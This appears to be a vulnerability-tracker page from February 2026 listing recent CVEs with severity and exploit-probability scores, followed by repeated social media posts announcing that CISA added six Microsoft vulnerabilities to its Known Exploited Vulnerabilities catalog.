## Updated at UTC 2026-02-10T23:30:54.068741

Access data as JSON

CVE CVSS EPSS Posts Repos Nuclei Updated Description
CVE-2026-21510 8.8 0.00% 10 0 2026-02-10T21:51:48.077000 Protection mechanism failure in Windows Shell allows an unauthorized attacker to
CVE-2026-21513 8.8 0.00% 10 0 2026-02-10T21:51:48.077000 Protection mechanism failure in MSHTML Framework allows an unauthorized attacker
CVE-2026-21514 7.8 0.00% 9 0 2026-02-10T21:51:48.077000 Reliance on untrusted inputs in a security decision in Microsoft Office Word all
CVE-2026-21519 7.8 0.00% 9 0 2026-02-10T21:51:48.077000 Access of resource using incompatible type ('type confusion') in Desktop Window
CVE-2026-21525 6.2 0.00% 9 0 2026-02-10T21:51:48.077000 Null pointer dereference in Windows Remote Access Connection Manager allows an u
CVE-2026-21533 7.8 0.00% 9 0 2026-02-10T21:51:48.077000 Improper privilege management in Windows Remote Desktop allows an authorized att
CVE-2026-20841 8.8 0.00% 4 0 2026-02-10T21:51:48.077000 Improper neutralization of special elements used in a command ('command injectio
CVE-2026-21347 7.8 0.00% 2 0 2026-02-10T21:51:48.077000 Bridge versions 15.1.3, 16.0.1 and earlier are affected by an Integer Overflow o
CVE-2026-21346 7.8 0.00% 2 0 2026-02-10T21:51:48.077000 Bridge versions 15.1.3, 16.0.1 and earlier are affected by an out-of-bounds writ
CVE-2026-21345 7.8 0.00% 2 0 2026-02-10T21:51:48.077000 Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds
CVE-2026-1602 6.5 0.00% 2 0 2026-02-10T21:51:48.077000 SQL injection in Ivanti Endpoint Manager before version 2024 SU5 allows a remote
CVE-2026-21344 7.8 0.00% 2 0 2026-02-10T21:31:42 Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds
CVE-2026-1507 7.5 0.00% 2 0 2026-02-10T21:31:42 The affected products are vulnerable to an uncaught exception that could allow a
CVE-2026-21349 7.8 0.00% 2 0 2026-02-10T21:31:42 Lightroom Desktop versions 15.1 and earlier are affected by an out-of-bounds wri
CVE-2026-21353 7.8 0.00% 2 0 2026-02-10T21:31:41 DNG SDK versions 1.7.1 2410 and earlier are affected by an Integer Overflow or W
CVE-2026-21352 7.8 0.00% 2 0 2026-02-10T21:31:41 DNG SDK versions 1.7.1 2410 and earlier are affected by an out-of-bounds write v
CVE-2026-2139 8.8 0.09% 1 0 2026-02-10T19:29:09.960000 A vulnerability was determined in Tenda TX9 up to 22.03.02.10_multi. Affected by
CVE-2026-1486 8.8 0.04% 2 0 2026-02-10T18:35:16 A flaw was found in Keycloak. A vulnerability exists in the jwt-authorization-gr
CVE-2026-1603 8.6 0.00% 2 0 2026-02-10T18:30:49 An authentication bypass in Ivanti Endpoint Manager before version 2024 SU5 allo
CVE-2025-52436 8.8 0.00% 1 0 2026-02-10T18:30:40 An Improper Neutralization of Input During Web Page Generation ('Cross-site Scri
CVE-2026-24061 9.8 32.54% 4 62 template 2026-02-10T18:30:34 telnetd in GNU Inetutils through 2.7 allows remote authentication bypass via a "
CVE-2025-70963 7.6 0.04% 1 0 2026-02-10T18:23:11.493000 Gophish <=0.12.1 is vulnerable to Incorrect Access Control. The administrative d
CVE-2025-6967 8.7 0.00% 4 0 2026-02-10T15:30:34 Execution After Redirect (EAR) vulnerability in Sarman Soft Software and Technol
CVE-2026-2203 8.8 0.09% 1 0 2026-02-10T15:30:26 A flaw has been found in Tenda AC8 16.03.33.05. Affected by this vulnerability i
CVE-2026-23687 8.8 0.05% 8 0 2026-02-10T15:22:54.740000 SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated
CVE-2026-23717 7.8 0.01% 2 0 2026-02-10T15:22:54.740000 A vulnerability has been identified in Simcenter Femap (All versions < V2512), S
CVE-2026-22923 7.8 0.01% 2 0 2026-02-10T15:22:54.740000 A vulnerability has been identified in NX (All versions < V2512). The affected a
CVE-2026-2268 7.5 0.04% 2 1 2026-02-10T15:22:54.740000 The Ninja Forms plugin for WordPress is vulnerable to Sensitive Information Expo
CVE-2026-2096 9.8 0.13% 7 0 2026-02-10T15:22:54.740000 Agentflow developed by Flowring has a Missing Authentication vulnerability, allo
CVE-2026-2093 7.5 0.05% 2 0 2026-02-10T15:22:54.740000 Docpedia developed by Flowring has a SQL Injection vulnerability, allowing unaut
CVE-2026-24322 7.7 0.03% 4 0 2026-02-10T15:22:54.740000 SAP Solution Tools Plug-In (ST-PI) contains a function module that does not perf
CVE-2026-25893 0 0.20% 1 0 2026-02-10T15:22:54.740000 FUXA is a web-based Process Visualization (SCADA/HMI/Dashboard) software. Prior
CVE-2025-15310 7.8 0.02% 1 0 2026-02-10T15:22:54.740000 Tanium addressed a local privilege escalation vulnerability in Patch Endpoint To
CVE-2026-25807 8.8 0.11% 1 1 2026-02-10T15:22:54.740000 ZAI Shell is an autonomous SysOps agent designed to navigate, repair, and secure
CVE-2026-25961 7.5 0.01% 1 1 2026-02-10T15:22:54.740000 SumatraPDF is a multi-format reader for Windows. In 3.5.0 through 3.5.2, Sumatra
CVE-2026-2066 8.8 0.04% 1 0 2026-02-10T15:11:28.863000 A weakness has been identified in UTT 进取 520W 1.7.7-180627. This affects the fun
CVE-2026-2202 8.8 0.09% 1 0 2026-02-10T15:07:30.390000 A vulnerability was detected in Tenda AC8 16.03.33.05. Affected is the function
CVE-2026-24684 7.5 0.04% 2 0 2026-02-10T15:02:32.033000 FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.22.0
CVE-2026-2185 8.8 0.05% 1 7 2026-02-10T14:54:35.470000 A flaw has been found in Tenda RX3 16.03.13.11. This issue affects the function
CVE-2026-25656 7.8 0.01% 2 0 2026-02-10T12:30:34 A vulnerability has been identified in SINEC NMS (All versions), User Management
CVE-2026-23720 7.8 0.01% 2 0 2026-02-10T12:30:34 A vulnerability has been identified in Simcenter Femap (All versions < V2512), S
CVE-2026-25655 7.8 0.01% 2 0 2026-02-10T12:30:33 A vulnerability has been identified in SINEC NMS (All versions < V4.0 SP2). The
CVE-2026-23719 7.8 0.01% 2 0 2026-02-10T12:30:28 A vulnerability has been identified in Simcenter Femap (All versions < V2512), S
CVE-2026-23718 7.8 0.01% 2 0 2026-02-10T12:30:28 A vulnerability has been identified in Simcenter Femap (All versions < V2512), S
CVE-2026-23716 7.8 0.01% 2 0 2026-02-10T12:30:28 A vulnerability has been identified in Simcenter Femap (All versions < V2512), S
CVE-2025-40587 7.6 0.04% 2 0 2026-02-10T12:30:27 A vulnerability has been identified in Polarion V2404 (All versions < V2404.5),
CVE-2026-23715 7.8 0.01% 2 0 2026-02-10T12:30:27 A vulnerability has been identified in Simcenter Femap (All versions < V2512), S
CVE-2026-2095 9.8 0.17% 3 0 2026-02-10T09:30:31 Agentflow developed by Flowring has an Authentication Bypass vulnerability, allo
CVE-2026-2094 8.8 0.08% 4 0 2026-02-10T09:30:31 Docpedia developed by Flowring has a SQL Injection vulnerability, allowing authe
CVE-2026-2097 8.8 0.21% 6 0 2026-02-10T09:30:31 Agentflow developed by Flowring has an Arbitrary File Upload vulnerability, allo
CVE-2025-11242 9.8 0.04% 2 0 2026-02-10T09:30:27 Server-Side Request Forgery (SSRF) vulnerability in Teknolist Computer Systems S
CVE-2026-23689 7.7 0.07% 2 0 2026-02-10T06:30:44 Due to an uncontrolled resource consumption (Denial of Service) vulnerability, a
CVE-2025-11547 7.8 0.01% 2 0 2026-02-10T06:30:40 AXIS Camera Station Pro contained a flaw to perform a privilege escalation attac
CVE-2026-0509 9.6 0.04% 7 0 2026-02-10T06:30:39 SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated,
CVE-2026-0490 7.5 0.08% 2 0 2026-02-10T06:30:39 SAP BusinessObjects BI Platform allows an unauthenticated attacker to craft a sp
CVE-2026-0488 10.0 0.04% 3 0 2026-02-10T06:30:38 An authenticated attacker in SAP CRM and SAP S/4HANA (Scripting Editor) could ex
CVE-2026-0485 7.5 0.04% 2 0 2026-02-10T06:30:38 SAP BusinessObjects BI Platform allows an unauthenticated attacker to send speci
CVE-2026-25958 7.7 0.01% 1 0 2026-02-10T02:57:34 ### **Impact** It is possible to make a specially crafted request with a valid
CVE-2026-25939 None 0.03% 1 1 2026-02-10T02:56:59 ### Summary An authorization bypass vulnerability in the FUXA allows an unauthen
CVE-2026-25894 None 0.23% 1 0 2026-02-10T02:56:49 ### Description An insecure default configuration in FUXA allows an unauthentica
CVE-2026-25890 8.1 0.03% 1 0 2026-02-10T02:56:39 ### Summary An authenticated user can bypass the application's "Disallow" file p
CVE-2026-25881 9.1 0.05% 1 0 2026-02-10T02:56:34 ### Summary A sandbox escape vulnerability allows sandboxed code to mutate host
CVE-2026-25892 7.5 0.06% 1 0 2026-02-10T02:56:05 ### Summary Adminer v5.4.1 has a version check mechanism where `adminer.org` sen
CVE-2026-1529 8.1 0.02% 1 1 2026-02-10T02:15:52.253000 A flaw was found in Keycloak. An attacker can exploit this vulnerability by modi
CVE-2025-15319 7.8 0.01% 1 0 2026-02-10T00:30:37 Tanium addressed a local privilege escalation vulnerability in Patch Endpoint To
CVE-2026-25791 7.5 0.04% 1 0 2026-02-09T22:39:51 ## Summary The DNS C2 listener accepts unauthenticated `TOTP` bootstrap messages
CVE-2026-25639 7.5 0.01% 1 0 2026-02-09T22:39:36 # Denial of Service via **proto** Key in mergeConfig ### Summary The `mergeCon
CVE-2026-25761 8.8 0.04% 1 0 2026-02-09T21:55:30.093000 Super-linter is a combination of multiple linters to run as a GitHub Action or s
CVE-2025-69214 8.8 0.01% 1 0 2026-02-09T21:53:03.017000 OpenSTAManager is an open source management software for technical assistance an
CVE-2026-25803 9.8 0.04% 2 0 2026-02-09T16:08:55.263000 3DP-MANAGER is an inbound generator for 3x-ui. In version 2.0.1 and prior, the a
CVE-2026-2070 8.8 0.04% 1 0 2026-02-09T16:08:55.263000 A vulnerability has been found in UTT 进取 520W 1.7.7-180627. The affected element
CVE-2026-2068 8.8 0.04% 1 0 2026-02-09T16:08:55.263000 A vulnerability was detected in UTT 进取 520W 1.7.7-180627. This issue affects the
CVE-2025-10465 8.8 0.02% 1 0 2026-02-09T16:08:35.290000 Unrestricted Upload of File with Dangerous Type vulnerability in Birtech Informa
CVE-2025-7799 8.6 0.04% 1 0 2026-02-09T16:08:35.290000 Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site
CVE-2026-2236 7.5 0.05% 3 0 2026-02-09T16:08:35.290000 C&Cm@il developed by HGiga has a SQL Injection vulnerability, allowing unauthen
CVE-2026-22903 9.8 0.43% 1 0 2026-02-09T16:08:35.290000 An unauthenticated remote attacker can send a crafted HTTP request containing an
CVE-2026-0870 7.8 0.01% 1 0 2026-02-09T16:08:35.290000 MacroHub developed by GIGABYTE has a Local Privilege Escalation vulnerability. D
CVE-2025-15100 8.8 0.04% 1 0 2026-02-09T16:08:35.290000 The JAY Login & Register plugin for WordPress is vulnerable to Privilege Escalat
CVE-2026-2086 8.8 0.04% 1 0 2026-02-09T16:08:35.290000 A vulnerability was detected in UTT HiPER 810G up to 1.7.7-171114. Affected by t
CVE-2025-59023 8.2 0.01% 1 0 2026-02-09T15:30:37 Crafted delegations or IP fragments can poison cached delegations in Recursor.
CVE-2026-25724 7.5 0.04% 1 0 2026-02-09T14:47:41.783000 Claude Code is an agentic coding tool. Prior to version 2.1.7, Claude Code faile
CVE-2025-6830 9.8 0.01% 1 0 2026-02-09T12:30:30 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injecti
CVE-2026-25848 9.1 0.00% 1 0 2026-02-09T12:30:30 In JetBrains Hub before 2025.3.119807 authentication bypass allowing administrat
CVE-2026-25847 8.2 0.00% 1 0 2026-02-09T12:30:30 In JetBrains PyCharm before 2025.3.2 a DOM-based XSS on Jupyter viewer page was
CVE-2026-1709 9.4 0.06% 1 0 2026-02-09T10:15:57.377000 A flaw was found in Keylime. The Keylime registrar, since version 7.12.0, does n
CVE-2026-2234 9.1 0.05% 3 0 2026-02-09T09:30:28 C&Cm@il developed by HGiga has a Missing Authentication vulnerability, allowing
CVE-2026-22904 9.8 0.12% 1 0 2026-02-09T09:30:28 Improper length handling when parsing multiple cookie fields (including TRACKID)
CVE-2026-1868 10.0 0.03% 1 0 2026-02-09T09:30:28 GitLab has remediated a vulnerability in the Duo Workflow Service component of G
CVE-2026-22905 7.5 0.10% 2 0 2026-02-09T09:30:27 An unauthenticated remote attacker can bypass authentication by exploiting insuf
CVE-2026-22906 9.8 0.07% 1 0 2026-02-09T09:30:27 User credentials are stored using AES‑ECB encryption with a hardcoded key. An un
CVE-2026-1615 9.8 0.22% 1 0 2026-02-09T06:30:37 All versions of the package jsonpath are vulnerable to Arbitrary Code Injection
CVE-2026-2186 8.8 0.05% 1 0 2026-02-08T21:30:29 A vulnerability has been found in Tenda RX3 16.03.13.11. Impacted is the functio
CVE-2026-2187 8.8 0.05% 1 1 2026-02-08T21:30:29 A vulnerability was found in Tenda RX3 16.03.13.11. The affected element is the
CVE-2026-2181 8.8 0.05% 1 0 2026-02-08T21:30:29 A security flaw has been discovered in Tenda RX3 16.03.13.11. Affected by this v
CVE-2026-2180 8.8 0.05% 1 0 2026-02-08T21:30:19 A vulnerability was identified in Tenda RX3 16.03.13.11. Affected is an unknown
CVE-2026-2140 8.8 0.09% 1 0 2026-02-08T09:30:22 A vulnerability was identified in Tenda TX9 up to 22.03.02.10_multi. Affected by
CVE-2026-2137 8.8 0.09% 1 0 2026-02-08T06:31:54 A vulnerability has been found in Tenda TX3 up to 16.03.13.11_multi. This impact
CVE-2026-2138 8.8 0.09% 1 0 2026-02-08T06:31:53 A vulnerability was found in Tenda TX9 up to 22.03.02.10_multi. Affected is the
CVE-2025-15027 9.8 0.07% 1 0 2026-02-08T03:30:35 The JAY Login & Register plugin for WordPress is vulnerable to Privilege Escalat
CVE-2026-2071 8.8 0.04% 1 0 2026-02-07T03:30:18 A vulnerability was found in UTT 进取 520W 1.7.7-180627. The impacted element is t
CVE-2026-25762 7.5 0.01% 1 0 2026-02-07T00:33:35 ### Summary A Denial of Service (DoS) vulnerability (CWE-400) exists in the mul
CVE-2026-25732 7.5 0.12% 1 1 2026-02-07T00:31:59 ### Summary NiceGUI's `FileUpload.name` property exposes client-supplied filenam
CVE-2026-25544 9.8 0.05% 2 0 2026-02-07T00:31:53 ### Impact When querying JSON or richText fields, user input was directly embed
CVE-2026-1731 None 0.44% 4 1 template 2026-02-07T00:30:34 BeyondTrust Remote Support (RS) and certain older versions of Privileged Remote
CVE-2025-69212 None 0.09% 1 0 2026-02-06T22:11:48 ## Summary A critical OS Command Injection vulnerability exists in the P7M (sign
CVE-2026-25593 8.4 0.10% 1 0 2026-02-06T21:57:22.450000 OpenClaw is a personal AI assistant. Prior to 2026.1.20, an unauthenticated loca
CVE-2026-25632 10.0 0.11% 2 0 2026-02-06T21:57:22.450000 EPyT-Flow is a Python package designed for the easy generation of hydraulic and
CVE-2026-25628 8.6 0.04% 2 0 2026-02-06T21:44:00 ### Summary It is possible to append to arbitrary files via /logger endpoint. Mi
CVE-2026-25592 10.0 0.10% 1 0 2026-02-06T21:43:54 ### Impact _What kind of vulnerability is it? Who is impacted?_ An Arbitrary Fi
CVE-2026-25641 10.0 0.04% 2 0 2026-02-06T21:42:58 ### Summary A sandbox escape vulnerabilities due to a mismatch between the key o
CVE-2026-25587 10.0 0.05% 1 0 2026-02-06T21:42:55 ### Summary As `Map` is in `SAFE_PROTOYPES`, it's prototype can be obtained via
CVE-2026-25586 10.0 0.05% 1 0 2026-02-06T21:42:50 ## Summary A sandbox escape is possible by shadowing `hasOwnProperty` on a sandb
CVE-2026-25752 None 0.05% 2 0 2026-02-06T21:42:47 ### Summary **Description** An authorization bypass vulnerability in FUXA allows
CVE-2026-25751 None 0.05% 2 0 2026-02-06T21:42:43 ### Description An information disclosure vulnerability in FUXA allows an unauth
CVE-2026-25580 8.6 0.01% 1 0 2026-02-06T21:42:28 ## Summary A Server-Side Request Forgery (SSRF) vulnerability exists in Pydanti
CVE-2026-25520 10.0 0.08% 2 0 2026-02-06T21:42:24 ### Summary The return values of functions aren't wrapped. `Object.values`/`Obj
CVE-2026-23989 8.2 0.03% 1 0 2026-02-06T21:42:17 ### Impact A security issue was discovered in Reva based products that enables
CVE-2026-2067 8.8 0.04% 2 0 2026-02-06T21:30:58 A security vulnerability has been detected in UTT 进取 520W 1.7.7-180627. This vul
CVE-2026-25725 None 0.04% 1 0 2026-02-06T19:14:34 Claude Code's bubblewrap sandboxing mechanism failed to properly protect the .cl
CVE-2026-25722 None 0.09% 1 0 2026-02-06T19:02:42 Claude Code failed to properly validate directory changes when combined with wri
CVE-2026-2103 7.1 0.01% 2 0 2026-02-06T18:30:43 Infor SyteLine ERP uses hard-coded static cryptographic keys to encrypt stored c
CVE-2026-24423 9.8 9.22% 4 1 2026-02-06T16:45:15.323000 SmarterTools SmarterMail versions prior to build 9511 contain an unauthenticated
CVE-2026-21643 9.8 0.13% 6 1 2026-02-06T09:30:35 An improper neutralization of special elements used in an sql command ('sql inje
CVE-2025-11953 9.8 6.95% 1 4 2026-02-05T21:38:32 The Metro Development Server, which is opened by the React Native CLI, binds to
CVE-2026-25049 None 0.03% 1 1 2026-02-04T21:09:38 ### Impact Additional exploits in the expression evaluation of n8n have been id
CVE-2025-40551 9.8 54.99% 1 0 template 2026-02-04T02:00:02.030000 SolarWinds Web Help Desk was found to be susceptible to an untrusted data deseri
CVE-2025-11598 None 0.02% 1 0 2026-02-03T12:30:35 In mObywatel iOS application an unauthorized user can use the App Switcher to vi
CVE-2026-0227 7.5 0.06% 2 2 2026-01-31T00:31:36 A vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated
CVE-2026-1281 9.8 16.41% 4 1 2026-01-30T13:28:18.610000 A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve
CVE-2026-1340 9.8 0.18% 3 1 2026-01-30T00:31:28 A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve
CVE-2015-10145 8.8 0.10% 2 0 2026-01-29T18:32:39 Gargoyle router management utility versions 1.5.x contain an authenticated OS co
CVE-2025-15467 9.8 0.66% 3 4 2026-01-29T15:31:31 Issue summary: Parsing CMS AuthEnvelopedData message with maliciously crafted AE
CVE-2026-21441 7.5 0.02% 1 0 2026-01-23T16:05:22 ### Impact urllib3's [streaming API](https://urllib3.readthedocs.io/en/2.6.2/ad
CVE-2026-20817 7.8 0.06% 1 0 2026-01-14T20:31:32.760000 Improper handling of insufficient permissions or privileges in Windows Error Rep
CVE-2024-2511 5.9 3.67% 1 0 2025-11-04T00:31:52 Issue summary: Some non-default TLS server configurations can cause unbounded me
CVE-2025-53770 9.8 89.20% 4 46 template 2025-10-27T17:12:40.607000 Deserialization of untrusted data in on-premises Microsoft SharePoint Server all
CVE-2017-12615 8.1 94.22% 1 18 template 2025-10-22T17:31:15 When running Apache Tomcat 7.0.0 to 7.0.79 on Windows with HTTP PUTs enabled (e.
CVE-2017-12617 8.1 94.36% 1 13 template 2025-10-22T17:30:39 When running Apache Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC
CVE-2025-22225 8.3 5.41% 1 0 2025-10-22T00:33:13 VMware ESXi contains an arbitrary write vulnerability. A malicious actor with pr
CVE-2025-26399 9.8 12.86% 6 1 2025-09-23T06:30:33 SolarWinds Web Help Desk was found to be susceptible to an unauthenticated AjaxP
CVE-2025-27158 7.8 0.04% 1 0 2025-03-12T15:33:04 Acrobat Reader versions 24.001.30225, 20.005.30748, 25.001.20428 and earlier are
CVE-2026-25506 0 0.00% 2 0 N/A
CVE-2026-26009 0 0.00% 2 0 N/A
CVE-2026-1357 0 0.00% 1 1 N/A
CVE-2026-24682 0 0.04% 2 0 N/A
CVE-2026-25646 0 0.00% 2 0 N/A
CVE-2026-24476 0 0.03% 2 0 N/A
CVE-2026-23876 0 0.06% 1 0 N/A
CVE-2026-25931 0 0.01% 1 0 N/A
CVE-2026-25808 0 0.03% 1 0 N/A
CVE-2026-25880 0 0.01% 1 0 N/A
CVE-2026-25925 0 0.05% 1 0 N/A
CVE-2026-25231 0 0.06% 2 0 N/A
CVE-2026-25057 0 0.04% 1 0 N/A
CVE-2026-25740 0 0.01% 1 0 N/A
CVE-2026-25644 0 0.03% 1 0 N/A
CVE-2026-25636 0 0.01% 3 0 N/A
CVE-2026-25635 0 0.05% 3 0 N/A
CVE-2026-25634 0 0.01% 3 0 N/A
CVE-2026-25731 0 0.01% 2 1 N/A
CVE-2026-25643 0 0.47% 2 1 N/A

CVE-2026-21510
(8.8 HIGH)

EPSS: 0.00%

updated 2026-02-10T21:51:48.077000

10 posts

Protection mechanism failure in Windows Shell allows an unauthorized attacker to bypass a security feature over a network.

0x3e4@cyberplace.social at 2026-02-10T22:46:54.000Z ##

🔐 CVE-2026-21510
CVE-2026-21510

Protection mechanism failure in Windows Shell allows an unauthorized attacker to bypass a security feature over a network.

📊 CVSS Score: 8.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21510
🛡️ CWE: CWE-693
🔗 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: msrc.microsoft.com/update-guid cisa.gov/known-exploited-vulne

##

secdb at 2026-02-10T22:00:15.348Z ##

🚨 [CISA-2026:0210] CISA Adds 6 Known Exploited Vulnerabilities to Catalog (secdb.nttzen.cloud/security-ad)

CISA has added 6 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2026-21510 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Shell Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21513 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: portal.msrc.microsoft.com/en-U ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21514 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Office
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21519 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Type Confusion Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21525 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows NULL Pointer Dereference Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21533 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Improper Privilege Management Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

##

AAKL at 2026-02-10T21:44:38.176Z ##

CISA has updated the KEV catalogue, and Microsoft is the winner.

- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability cve.org/CVERecord?id=CVE-2026-

CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

More:

CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication cisa.gov/news-events/news/cisa

The guide: cisa.gov/resources-tools/resou

Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps cisa.gov/news-events/alerts/20

##

cisakevtracker@mastodon.social at 2026-02-10T19:01:53.000Z ##

CVE ID: CVE-2026-21510
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

DarkWebInformer at 2026-02-10T18:52:59.664Z ##

‼️ CISA has added 6 vulnerabilities to the KEV Catalog

CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.

CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.

##

0x3e4@cyberplace.social at 2026-02-10T22:46:54.000Z ##

🔐 CVE-2026-21510
CVE-2026-21510

Protection mechanism failure in Windows Shell allows an unauthorized attacker to bypass a security feature over a network.

📊 CVSS Score: 8.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21510
🛡️ CWE: CWE-693
🔗 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: msrc.microsoft.com/update-guid cisa.gov/known-exploited-vulne

##

AAKL@infosec.exchange at 2026-02-10T21:44:38.000Z ##

CISA has updated the KEV catalogue, and Microsoft is the winner.

- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability cve.org/CVERecord?id=CVE-2026-

CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

More:

CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication cisa.gov/news-events/news/cisa

The guide: cisa.gov/resources-tools/resou

Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps cisa.gov/news-events/alerts/20 #CISA #infosec #Microsoft #vulnerability

##

linux@activitypub.awakari.com at 2026-02-10T18:55:45.000Z ## Microsoft’s February 2026 Patch Tuesday Addresses 54 CVEs (CVE-2026-21510, CVE-2026-21513) 2 Critical 51 Important 1 Moderate 0 Low Microsoft addresses 54 CVEs in the February 2026 Patch Tuesday ...


Origin | Interest | Match ##

cisakevtracker@mastodon.social at 2026-02-10T19:01:53.000Z ##

CVE ID: CVE-2026-21510
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

DarkWebInformer@infosec.exchange at 2026-02-10T18:52:59.000Z ##

‼️ CISA has added 6 vulnerabilities to the KEV Catalog

CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.

